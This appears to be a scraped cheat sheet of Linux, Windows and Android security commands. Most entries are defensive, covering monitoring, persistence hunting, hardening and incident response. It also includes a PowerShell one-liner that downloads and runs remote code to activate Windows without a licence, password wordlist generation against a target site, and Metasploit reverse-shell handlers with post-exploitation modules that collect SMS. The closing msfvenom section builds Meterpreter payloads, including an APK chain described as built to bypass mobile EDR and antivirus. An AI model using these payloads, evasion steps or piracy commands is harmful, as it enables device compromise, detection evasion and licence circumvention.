strace -f ./sample.bin
Monitors system calls to detect file, process, and network activity.
ltrace ./sample.bin
Traces library calls to identify suspicious API usage.
tcpdump -i lo -nn
Monitors loopback traffic to catch local C2 communications in labs.
Purpose: Modify program logic to understand licensing checks and protection mechanisms.
objdump -d sample.bin | less
Disassembles binary to inspect control flow.
hexedit sample.bin
Allows low-level byte patching for controlled experiments.
cmp original.bin patched.bin
Compares original and modified binaries to document changes.
Purpose: Detect and block malicious USB/HID devices used for payload injection.
# Linux: Block new USB devices by default
echo 'SUBSYSTEM=="usb", ATTR{authorized}="0"' > /etc/udev/rules.d/99-usbblock.rules
# Allow only trusted USB devices (example)
echo 1 | tee /sys/bus/usb/devices/1-1/authorized
# Monitor USB events in real-time
udevadm monitor --environment --udev
Prevents BadUSB attacks, blocks unknown USB devices, and logs USB insertion activity for incident response.
Purpose: Reduce Bluetooth attack surface and detect rogue pairing attempts.
# Enforce non-discoverable mode bluetoothctl discoverable off # Remove unknown devices bluetoothctl remove AA:BB:CC:DD:EE:FF # Audit controller security btmgmt info # Disable Bluetooth when not required rfkill block bluetooth
Enforces secure Bluetooth posture in corporate endpoints, reduces BLE attack surface, and prevents rogue device abuse.
Purpose: Test Android apps that communicate with BLE devices.
# List connected BLE devices on Android (ADB) adb devices # Capture Bluetooth logs adb logcat | grep -i bluetooth # Decompile APK (static analysis) apktool d app.apk # Observe BLE UUIDs in code grep -R "0000" -n app/
Helps identify hardcoded BLE UUIDs, weak pairing logic, and insecure data handling in Android ↔ BLE apps.
Purpose: Study BLE MITM attack models in research environments.
# Install bettercap sudo apt install bettercap # Launch bettercap BLE mode sudo bettercap -iface hci0 # Enable BLE recon ble.recon on # List discovered BLE devices ble.show
Demonstrates BLE recon and MITM concepts in controlled labs for understanding attack surfaces and defenses.
Purpose: Test insecure BLE services (read/write without auth) in controlled labs.
# List services & characteristics gatttool -I connect AA:BB:CC:DD:EE:FF characteristics # Read characteristic (handle example) char-read-hnd 0x0025 # Write test payload (lab device only) char-write-req 0x0025 01020304
Identifies unauthenticated read/write characteristics in BLE devices used in IoT, fitness trackers, and smart locks (lab only).
Purpose: Capture and analyze BLE pairing and data exchange at HCI level.
# Live HCI packet capture sudo btmon # Save capture to file sudo btmon -w ble-capture.log # Review pairing & encryption events btmon
Useful for debugging BLE pairing flows, encryption negotiation, and detecting suspicious protocol behavior.
Purpose: Discover BLE devices and enumerate GATT services/characteristics.
# Scan BLE devices sudo btmgmt le on bluetoothctl scan on # Install BLE tools sudo apt install bluez # Connect to device (replace MAC) bluetoothctl connect AA:BB:CC:DD:EE:FF # GATT service enumeration gatttool -I connect AA:BB:CC:DD:EE:FF primary characteristics
Maps BLE services, characteristics, and permissions to identify insecure GATT endpoints in IoT and wearables.
Purpose: Detect exploitation behavior, memory injection, and suspicious process chains.
# Linux: Monitor suspicious process spawning ps -ef --forest # Detect hidden processes ls /proc | wc -l && ps aux | wc -l # Real-time syscall monitoring auditctl -a always,exit -F arch=b64 -S execve # Windows: Check suspicious parent-child processes wmic process get Name,ProcessId,ParentProcessId
Helps identify exploit chains, fileless malware, and abnormal process trees.
Purpose: Detect rogue access points and unauthorized device connections.
# Scan for rogue access points iw dev wlan0 scan | egrep 'BSS|SSID|signal' # List connected devices arp -a # Block unknown device (example) iptables -A INPUT -m mac --mac-source AA:BB:CC:DD:EE:FF -j DROP # Monitor network connections ss -tulnp
Prevents Evil Twin Wi-Fi attacks and unauthorized device persistence on internal networks.
Purpose: Find attacker persistence via startup scripts, services, and scheduled tasks.
# Linux: Check cron persistence crontab -l ls -la /etc/cron.* # Systemd persistence check systemctl list-unit-files --type=service # Windows: Startup entries wmic startup get Caption,Command # Scheduled tasks schtasks /query /fo LIST /v
Detects backdoors, startup persistence, and malware auto-execution techniques.
Purpose: Detect malicious apps, suspicious services, and privilege abuse.
# List installed packages adb shell pm list packages # Check running services adb shell service list # Find suspicious permissions adb shell dumpsys package com.target.app | grep permission # Check device rooting status adb shell su -c id
Helps detect spyware, stalkerware, and persistence on compromised Android devices.
Purpose: Detect and block malicious USB/HID devices used for payload injection.
# Linux: Block new USB devices by default
echo 'SUBSYSTEM=="usb", ATTR{authorized}="0"' > /etc/udev/rules.d/99-usbblock.rules
# Allow only trusted USB devices (example)
echo 1 | tee /sys/bus/usb/devices/1-1/authorized
# Monitor USB events in real-time
udevadm monitor --environment --udev
Prevents BadUSB attacks, blocks unknown USB devices, and logs USB insertion activity for incident response.
Purpose: Detect Bluetooth exploitation, unauthorized pairing, and rogue devices.
# Scan nearby Bluetooth devices bluetoothctl scan on # List paired devices bluetoothctl paired-devices # Block unknown device (example) bluetoothctl block AA:BB:CC:DD:EE:FF # Disable Bluetooth interface rfkill block bluetooth
Prevents BlueBorne-style attacks, unauthorized pairing, and Bluetooth-based lateral movement.
Purpose: Detect exploitation behavior, memory injection, and suspicious process chains.
# Linux: Monitor suspicious process spawning ps -ef --forest # Detect hidden processes ls /proc | wc -l && ps aux | wc -l # Real-time syscall monitoring auditctl -a always,exit -F arch=b64 -S execve # Windows: Check suspicious parent-child processes wmic process get Name,ProcessId,ParentProcessId
Helps identify exploit chains, fileless malware, and abnormal process trees.
Purpose: Detect rogue access points and unauthorized device connections.
# Scan for rogue access points iw dev wlan0 scan | egrep 'BSS|SSID|signal' # List connected devices arp -a # Block unknown device (example) iptables -A INPUT -m mac --mac-source AA:BB:CC:DD:EE:FF -j DROP # Monitor network connections ss -tulnp
Prevents Evil Twin Wi-Fi attacks and unauthorized device persistence on internal networks.
Purpose: Find attacker persistence via startup scripts, services, and scheduled tasks.
# Linux: Check cron persistence crontab -l ls -la /etc/cron.* # Systemd persistence check systemctl list-unit-files --type=service # Windows: Startup entries wmic startup get Caption,Command # Scheduled tasks schtasks /query /fo LIST /v
Detects backdoors, startup persistence, and malware auto-execution techniques.
Purpose: Detect malicious apps, suspicious services, and privilege abuse.
# List installed packages adb shell pm list packages # Check running services adb shell service list # Find suspicious permissions adb shell dumpsys package com.target.app | grep permission # Check device rooting status adb shell su -c id
Helps detect spyware, stalkerware, and persistence on compromised Android devices.
Purpose: Detect command-and-control beaconing patterns from infected devices.
# Zeek: find periodic small outbound connections cat conn.log | zeek-cut id.orig_h id.resp_h resp_bytes duration | sort | uniq -c # Suricata: alert on suspicious DNS tunneling grep "DNS" /var/log/suricata/fast.log # Elastic SIEM (KQL) – beaconing pattern destination.ip: * and network.bytes < 200 and event.duration > 30s
Identifies malware C2 traffic by spotting low-volume, periodic outbound connections often used by RATs and botnets.
Purpose: Detect SQLi, RCE, and webshell uploads in real-world web servers.
# Apache: detect command injection attempts
grep -Ei "(\;|\|\||\`|\$\( )" /var/log/apache2/access.log
# Detect webshell patterns
grep -R "eval\(|base64_decode\(" /var/www/html
# ModSecurity: review critical alerts
grep "CRITICAL" /var/log/modsec_audit.log
Helps detect active exploitation attempts and malicious file uploads on production web servers.
Purpose: Hunt for persistence mechanisms left by attackers.
# Linux: cron job persistence ls -la /etc/cron* /var/spool/cron/ # Check startup services systemctl list-unit-files --type=service | grep enabled # Find hidden autostart binaries find /etc/init.d /etc/systemd/system -type f -mtime -3
Detects attacker persistence such as malicious cron jobs, startup services, and backdoor binaries.
Purpose: Detect early indicators of ransomware encryption activity.
# Detect mass file modifications auditctl -a always,exit -F arch=b64 -S unlink,rename -k ransomware_activity # Monitor sudden high I/O iotop -oPa # Find suspicious encryption tools ps aux | grep -E "openssl|gpg|crypt"
Flags ransomware behaviors such as mass file deletion/renaming and suspicious encryption processes.
Purpose: Collect volatile evidence from compromised devices safely.
# Capture running processes and network connections ps auxf > ir_processes.txt ss -tunap > ir_network.txt # Memory snapshot (if LiME installed) insmod lime.ko "path=/mnt/usb/memory.lime format=lime" # Hash critical binaries sha256sum /bin/* > ir_hashes.txt
Preserves forensic evidence before attackers can clean traces, enabling root-cause analysis.
Purpose: Match Indicators of Compromise (IOCs) against logs and endpoints.
# Match malicious IPs against firewall logs grep -Ff ioc_ips.txt /var/log/iptables.log # Check hashes against known malware sha256sum suspicious.bin | grep -Ff bad_hashes.txt # DNS logs IOC matching grep -Ff ioc_domains.txt /var/log/zeek/dns.log
Enriches detections using threat intelligence feeds to identify known malware infrastructure.
Purpose: Instantly isolate compromised devices from the network.
# Block outbound traffic from compromised host iptables -I OUTPUT -j DROP # Disable compromised user account usermod -L compromised_user # Kill suspicious process kill -9 1337 # Revoke SSH access sed -i 's/^AllowUsers.*/AllowUsers admin/' /etc/ssh/sshd_config systemctl restart ssh
Enables rapid containment to stop data exfiltration and lateral movement during active incidents.
Purpose: Display cinematic hacker-style terminal screens for demos or content creation.
# Install and run sudo apt update sudo apt install hollywood hollywood
Shows animated fake hacking dashboards. Useful for presentations, videos, and learning terminal layouts without doing real attacks.
Purpose: Show Matrix-style falling green code in terminal.
# Install and run sudo apt install cmatrix cmatrix -a -b -u 5
Purely visual effect. Useful to customize terminal demos or hacker-themed screenshots/videos.
Purpose: Display OS, kernel, CPU, RAM, GPU info with Kali logo.
# Install and run sudo apt install neofetch neofetch
Shows your system configuration in a stylish banner. Commonly used in screenshots and setup verification.
Purpose: Monitor CPU, RAM, processes, and system load interactively.
# Install and run sudo apt install htop htop
Real-time monitoring of running processes. Helps debug heavy tools, crashes, or performance issues.
Purpose: Show animated ASCII fish aquarium in terminal.
# Install and run sudo apt install asciiquarium asciiquarium
Fun terminal animation. Useful for terminal customization, breaks during study, or hacker-themed visuals.
Purpose: Create large ASCII art text banners.
# Install sudo apt install toilet figlet # Examples figlet "ARG CYBER" toilet "KALI LINUX" -f big -F border
Generates big text banners for scripts, screenshots, and terminal branding.
Purpose: Colorize terminal output with rainbow effects.
# Install sudo apt install lolcat # Examples neofetch | lolcat figlet "WELCOME" | lolcat
Adds colorful output to commands. Often used for custom scripts and terminal branding.
Purpose: Print messages with ASCII characters.
# Install sudo apt install cowsay # Examples cowsay "Hack the planet (legally)" fortune | cowsay -f dragon
Fun messages for scripts, terminal greetings, and learning shell piping.
Purpose: Funny train animation in terminal when you type wrong command.
# Install sudo apt install sl # Examples sl sl -a sl -l sl -F
Fun prank tool, terminal animation practice, and Linux terminal familiarity.
Purpose: Play the 2048 game inside terminal.
# Install sudo apt install 2048-c # Examples 2048-c
Improves keyboard handling, terminal gaming, and focus training.
Purpose: Print colorful and stylish ASCII text in terminal.
# Install sudo apt install toilet # Examples toilet HACKER toilet -f big HACKER toilet -f mono12 -F metal HACKER
Used for terminal banners, hacking-themed headers, and shell customization.
Purpose: View Markdown files beautifully inside terminal.
# Install sudo apt install glow # Examples glow README.md glow notes.md
Great for viewing docs, README files, and learning Markdown in terminal UI.
Purpose: Measure how long a command takes to execute.
# Built-in command (no install needed) time ls time ping -c 4 google.com
Useful for performance testing, script optimization, and command benchmarking.
Purpose: Navigate files with Vim-style keybindings.
# Install sudo apt install ranger # Examples ranger
Fast file navigation for payloads, wordlists, scripts, and loot directories.
Purpose: Monitor CPU, RAM, and running processes in real time.
# Install sudo apt install htop # Examples htop
Useful during brute-force labs, payload execution monitoring, and resource analysis.
Purpose: List files with colors, icons, and git status.
# Install sudo apt install exa # Examples exa exa -l exa -la --git
Improves terminal UX, directory auditing, and file reconnaissance.
Purpose: View files with syntax highlighting, line numbers, and git integration.
# Install sudo apt install bat # Examples bat script.sh bat README.md
Better than cat for reading code, configs, and hacking scripts safely.
Purpose: Create an isolated virtual lab to practice security testing safely.
# Update system first sudo apt update && sudo apt upgrade -y # Check network ip a ip route
Install Kali Linux inside VirtualBox. Use NAT or Host-Only network to keep your lab isolated from the real internet. This prevents accidental attacks on real systems and keeps your practice environment legal.
Purpose: Practice common web vulnerabilities like SQLi, XSS, CSRF locally.
# Install Apache, PHP, MySQL sudo apt install apache2 php php-mysqli mariadb-server -y # Download DVWA cd /var/www/html sudo git clone https://github.com/digininja/DVWA.git dvwa # Permissions sudo chown -R www-data:www-data dvwa sudo chmod -R 755 dvwa # Start services sudo systemctl start apache2 sudo systemctl start mariadb
DVWA is an intentionally vulnerable web application. It helps beginners understand how web attacks work in a legal lab. Access in browser: http://127.0.0.1/dvwa and complete the setup page.
Purpose: Setup database backend for DVWA.
# Login to MariaDB sudo mysql -u root # Inside MySQL CREATE DATABASE dvwa; CREATE USER 'dvwa'@'localhost' IDENTIFIED BY 'password'; GRANT ALL PRIVILEGES ON dvwa.* TO 'dvwa'@'localhost'; FLUSH PRIVILEGES; EXIT;
DVWA requires a database to store users and vulnerable data. These credentials are for local lab only. Never use weak passwords like this on real servers.
Purpose: Modern vulnerable web app for bug bounty style practice.
# Install Docker sudo apt install docker.io -y sudo systemctl start docker sudo systemctl enable docker # Run Juice Shop sudo docker run -d -p 3000:3000 bkimminich/juice-shop
OWASP Juice Shop simulates real-world web app vulnerabilities found in bug bounty programs. Access in browser: http://127.0.0.1:3000
Purpose: Practice network & service exploitation in a full vulnerable OS.
# Check target IP nmap -sn 192.168.56.0/24 # Scan services nmap -sC -sV 192.168.56.101
Metasploitable2 is a purposely vulnerable Linux VM. Place it in Host-Only network with Kali. This allows safe exploitation practice without exposing real networks.
Purpose: Prevent lab machines from accessing the real internet.
# Check interfaces ip a # VirtualBox recommended Host-Only Adapter or NAT + Host-Only (Dual NIC)
Using Host-Only networking ensures attacks remain inside your local lab. This is critical for legal and ethical security testing.
Purpose: Restore clean state after attacks or misconfigurations.
# Take VM snapshot (VirtualBox GUI) Machine -> Take Snapshot # Reset services sudo systemctl restart apache2 sudo systemctl restart mariadb sudo docker restart $(sudo docker ps -q)
Snapshots let you revert the lab after breaking things during practice. This is how real-world testers maintain clean testing environments.
Purpose: Verify Windows activation status, troubleshoot licensing, and manage KMS/MAK activation in compliant enterprise environments.
# Check Windows edition & activation status slmgr /dli slmgr /xpr # Detailed license information slmgr /dlv # View installed product key (last 5 chars only) wmic path SoftwareLicensingService get OA3xOriginalProductKey # Set enterprise KMS server (authorized environment) slmgr /skms kms.yourcompany.local # Activate against authorized KMS slmgr /ato # Clear cached KMS (troubleshooting) slmgr /ckms # Force activation retry slmgr /rearm
Used by enterprise admins to validate activation state, troubleshoot KMS connectivity, ensure compliance with licensing, and resolve activation issues without violating software terms.
Purpose: Windows Activate without purchasing any microsoft product key.
Process-
1.Open (Powershell) Run as Administrator.
2.Type this command or copy paste.
3.Choose a activation option.
irm https://get.activated.win | iex
Activate Windows 10-11 , Microsoft Office - Excel, Ms-word etc and get full accesbility of persionlized features.
Purpose: Install and manage Kali Linux on Windows using PowerShell (WSL) for legal penetration testing labs.
# Enable WSL & Virtual Machine Platform (Run PowerShell as Admin) dism.exe /online /enable-feature /featurename:Microsoft-Windows-Subsystem-Linux /all /norestart dism.exe /online /enable-feature /featurename:VirtualMachinePlatform /all /norestart # Set WSL 2 as default wsl --set-default-version 2 # Install Kali Linux from Microsoft Store (CLI way) wsl --install -d kali-linux # Verify installed distros wsl -l -v # Launch Kali Linux wsl -d kali-linux # Update Kali packages after first launch sudo apt update && sudo apt full-upgrade -y
Installs Kali Linux inside Windows using WSL2 for ethical hacking practice, labs, tool testing, and cybersecurity training without dual-boot or virtual machine overhead.
Purpose: Perform deep system reconnaissance and live monitoring on Windows endpoints.
Get-Process | Sort-Object CPU -Descending | Select-Object -First 10
Get-NetTCPConnection -State Established
Get-Service | Where-Object {$_.Status -eq "Running"}
Get-EventLog -LogName Security -Newest 20
Identifies top resource-consuming processes, active network connections, running services, and recent security events for threat hunting and incident response.
Purpose: Harden Windows endpoints and reduce common attack surfaces.
Set-MpPreference -DisableRealtimeMonitoring $false
Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
Set-ExecutionPolicy RemoteSigned -Scope LocalMachine
Get-NetFirewallProfile | Set-NetFirewallProfile -Enabled True
Enforces Defender protection, disables legacy SMBv1, locks PowerShell execution policy, and ensures firewall is enabled on all profiles.
Purpose: Detect suspicious persistence mechanisms and startup abuse.
Get-CimInstance Win32_StartupCommand
Get-ScheduledTask | Where-Object {$_.State -ne "Ready"}
Get-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run"
Get-WmiObject Win32_Service | Where-Object {$_.PathName -notlike "*system32*"}
Enumerates startup entries, scheduled tasks, autorun registry keys, and suspicious services for persistence detection.
Purpose: Identify abnormal network activity and possible lateral movement.
Get-NetTCPConnection | Where-Object {$_.State -eq "Established"}
Get-SmbSession
Get-NetNeighbor
arp -a
Detects suspicious internal connections, SMB sessions, ARP mappings, and unusual peer communications inside corporate networks.
Purpose: Analyze authentication events and potential credential abuse.
Get-EventLog -LogName Security -InstanceId 4624 -Newest 20
Get-EventLog -LogName Security -InstanceId 4625 -Newest 20
quser
Get-LocalUser
Reviews successful and failed logons, active user sessions, and local user accounts to detect brute-force or misuse.
Purpose: Audit IIS web server configuration and exposed services.
Import-Module WebAdministration
Get-Website
Get-WebBinding
Get-ChildItem IIS:\AppPools
netstat -ano | findstr :80
Enumerates IIS websites, bindings, application pools, and active web ports to find exposed or misconfigured services.
Purpose: Automate forensic log collection during incidents.
$path = "C:\IR\logs"
New-Item -ItemType Directory -Path $path -Force
Get-EventLog -LogName System -Newest 200 | Out-File "$path\system.log"
Get-EventLog -LogName Security -Newest 200 | Out-File "$path\security.log"
Get-Process | Out-File "$path\processes.txt"
Collects system logs and running processes into incident response folders for later forensic analysis.
Purpose: Analyze active network connections and open services on a device.
netstat -ano
netstat -anob
ipconfig /all
route print
Displays listening and established connections with process IDs and bound binaries. Useful for detecting suspicious outbound connections and rogue services.
Purpose: Audit Windows Firewall rules and exposed ports.
netsh advfirewall show allprofiles
netsh advfirewall firewall show rule name=all
netsh interface ipv4 show excludedportrange protocol=tcp
Enumerates firewall profiles, firewall rules, and reserved TCP port ranges to identify misconfigurations and unnecessary exposure.
Purpose: Inspect running processes and services for malicious binaries.
tasklist /v
tasklist /svc
sc query
wmic process list full
Maps processes to services and reveals execution paths to detect malware or suspicious binaries running on the system.
Purpose: Identify persistence mechanisms used by malware.
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
schtasks /query /fo LIST /v
dir "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup"
Enumerates autorun registry keys, scheduled tasks, and startup folders used by malware for persistence.
Purpose: Audit user privileges and active sessions.
whoami /all
query user
net user
net localgroup administrators
Reveals token privileges, logged-in users, local accounts, and administrator group membership.
Purpose: Identify exposed web services and map ports to processes.
netstat -ano | findstr :80 netstat -ano | findstr :443 tasklist /fi "PID eq" sc query type= service
Detects web services running on HTTP/HTTPS ports and maps them to underlying processes and services.
Purpose: Collect forensic artifacts for investigation.
systeminfo
wevtutil qe Security /c:50 /f:text
dir C:\Windows\Temp
tree C:\ /f | more
Captures system info, recent security events, temp directory contents, and file structure for IR analysis.
Purpose: Generate detailed battery health and power reports.
powercfg /batteryreport
powercfg /energy
powercfg /sleepstudy
Generates HTML reports showing battery capacity degradation, power usage anomalies, and sleep state issues.
Purpose: Inspect saved Wi-Fi profiles and security configuration.
netsh wlan show profiles
netsh wlan show profile name="WiFi_Name" key=clear
netsh wlan show interfaces
netsh wlan show drivers
Lists saved Wi-Fi profiles, reveals stored keys (authorized audits only), shows live Wi-Fi interface status, and wireless driver capabilities.
Purpose: Validate disk health, drivers, and system file integrity.
chkdsk C: /scan
sfc /scannow
dism /online /cleanup-image /scanhealth
driverquery /v
Scans file system errors, verifies Windows system files, checks OS image health, and enumerates loaded drivers.
Purpose: Generate targeted wordlists using masks, patterns, and charsets.
# 8–12 length, lowercase + digits crunch 8 12 abcdefghijklmnopqrstuvwxyz0123456789 -o wordlist.txt # Pattern-based (name+year+symbol) crunch 10 10 -t @@@@@@@@20%% -o pattern.txt # Custom charset from list crunch 6 6 -f /usr/share/crunch/charset.lst mixalpha-numeric-all -o mask.txt
Patterned masks drastically reduce search space and runtime.
Purpose: Crawl target content to build context-aware wordlists.
# Crawl site, depth 2, include emails cewl https://target.com -d 2 -e -w cewl.txt # Min word length 5, unique words only cewl https://target.com -d 3 -m 5 -w custom.txt
Builds app-specific wordlists from public content (faster hits).
Purpose: Transform base lists into realistic variants (years, caps, symbols).
# Apply built-in rules to base wordlist john --wordlist=base.txt --rules --stdout > mutated.txt # Custom ruleset (example) john --wordlist=names.txt --rules=KoreLogic --stdout > pro-mutations.txt
Rules emulate human password habits to boost success rate.
Purpose: Merge multiple lists, deduplicate, and optimize size.
# Merge lists cat list1.txt list2.txt list3.txt > merged.txt # Deduplicate + sort sort -u merged.txt > final.txt # Filter by length (8–20 chars) awk 'length($0)>=8 && length($0)<=20' final.txt > filtered.txt
Smaller, curated lists = faster runs, higher signal-to-noise.
Purpose: Combine OSINT patterns with masks for precision lists.
# Example workflow # 1) names.txt from OSINT # 2) years.txt (1990–2026) # 3) symbols.txt (!@#) # Compose hybrid list paste -d '' names.txt years.txt | sed 's/$/!/' > hybrid.txt
Hybrid lists outperform generic megawordlists in real audits.
Purpose: Manage handlers, sessions, and post-exploitation for Android test devices.
msfconsole -q # High-rank Android modules search type:exploit platform:android rank:excellent # Handler (Android callbacks) use exploit/multi/handler set PAYLOAD android/meterpreter/reverse_tcp set LHOST 10.10.10.5 set LPORT 4444 setg ExitOnSession false exploit -j # Session triage sessions -l sessions -i 1 # Android post modules (inventory / hygiene) run post/android/gather/enum_applications run post/android/gather/enum_sms
Parallel handlers + session triage + Android-specific post modules for authorized mobile labs.
Purpose: Operate sessions, post modules, and automation for Windows lab hosts.
msfconsole -q # High-rank Windows modules search type:exploit platform:windows rank:excellent # Handler (Windows callbacks) use exploit/multi/handler set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST 10.10.10.5 set LPORT 4444 setg ExitOnSession false exploit -j # Session triage sessions -l sessions -i 1 # Post modules (inventory / hygiene) run post/windows/gather/enum_logged_on_users run post/multi/recon/local_exploit_suggester
Parallel callbacks, session triage, and post-exploitation hygiene for Windows enterprise labs.
Purpose: Handle sessions, enumerate configs, and pivot inside Linux lab networks.
msfconsole -q # High-rank Linux modules search type:exploit platform:linux rank:excellent # Handler (Linux callbacks) use exploit/multi/handler set PAYLOAD linux/x64/meterpreter/reverse_tcp set LHOST 10.10.10.5 set LPORT 4444 setg ExitOnSession false exploit -j # Session triage sessions -l sessions -i 1 # Linux post modules (configs / hygiene) run post/linux/gather/enum_configs # Pivot (lab segmentation) route add 10.0.0.0/24 1
Linux-specific post modules + routing for segmented-network drills in authorized labs.
Purpose: Build Android test payloads for detection research in controlled labs.
# List Android payloads msfvenom -l payloads | grep android # Generate test APK (lab only) msfvenom -p android/meterpreter/reverse_tcp LHOST=10.10.10.5 LPORT=4444 -o lab-test.apk # Sign APK for install in emulator / test phone jarsigner -keystore debug.keystore lab-test.apk androiddebugkey # Serve payload in lab python3 -m http.server 8080
Blue-team angle: test EDR/AV detection on emulators (Android Studio / Genymotion). Measure alerts, signatures, and behavioral flags — document detections.
Purpose: Generate Windows lab payloads to study detections & EDR telemetry.
# List Windows payloads msfvenom -l payloads | grep windows # Build test EXE (lab only) msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.5 LPORT=4444 -f exe -o lab-test.exe # Inspect binary properties file lab-test.exe sha256sum lab-test.exe # Drop in isolated VM and observe EDR alerts/logs
Blue-team angle: observe Defender/EDR alerts, AMSI hooks, process creation logs. Outcome: map which behaviors trigger detections (process injection, network callbacks).
Purpose: Generate obfuscated Android APK payloads to bypass mobile EDR/AV detections.
# List Android payloads msfvenom -l payloads | grep android # Basic APK payload (easily detected) msfvenom -p android/meterpreter/reverse_tcp LHOST=10.10.10.5 LPORT=4444 R > basic.apk # Stealth APK with custom template + encoding (lab evasion) msfvenom -p android/meterpreter/reverse_tcp LHOST=10.10.10.5 LPORT=4444 \ -e generic/none -i 5 --platform android \ -x /usr/share/metasploit-framework/data/templates/src/post/android.apk \ -o stealth-lab.apk # Advanced obfuscation chain (Pro evasion) msfvenom -p android/shell/reverse_tcp LHOST=10.10.10.5 LPORT=4444 \ -f raw -e x86/shikata_ga_nai -i 8 | \ msfvenom -p android/meterpreter/reverse_tcp LHOST=10.10.10.5 LPORT=4444 \ -e generic/none --platform android -a x86 -f apk -o evasive.apk # Verify & sign APK keytool -genkey -v -keystore lab.keystore -alias lab -keyalg RSA -keysize 2048 -validity 10000 jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore lab.keystore evasive.apk lab
Blue-team angle: Test on rooted Android emulator with Mobile Security Framework (MobSF). Monitor dex bytecode patterns, network C2, and Frida traces for evasion techniques.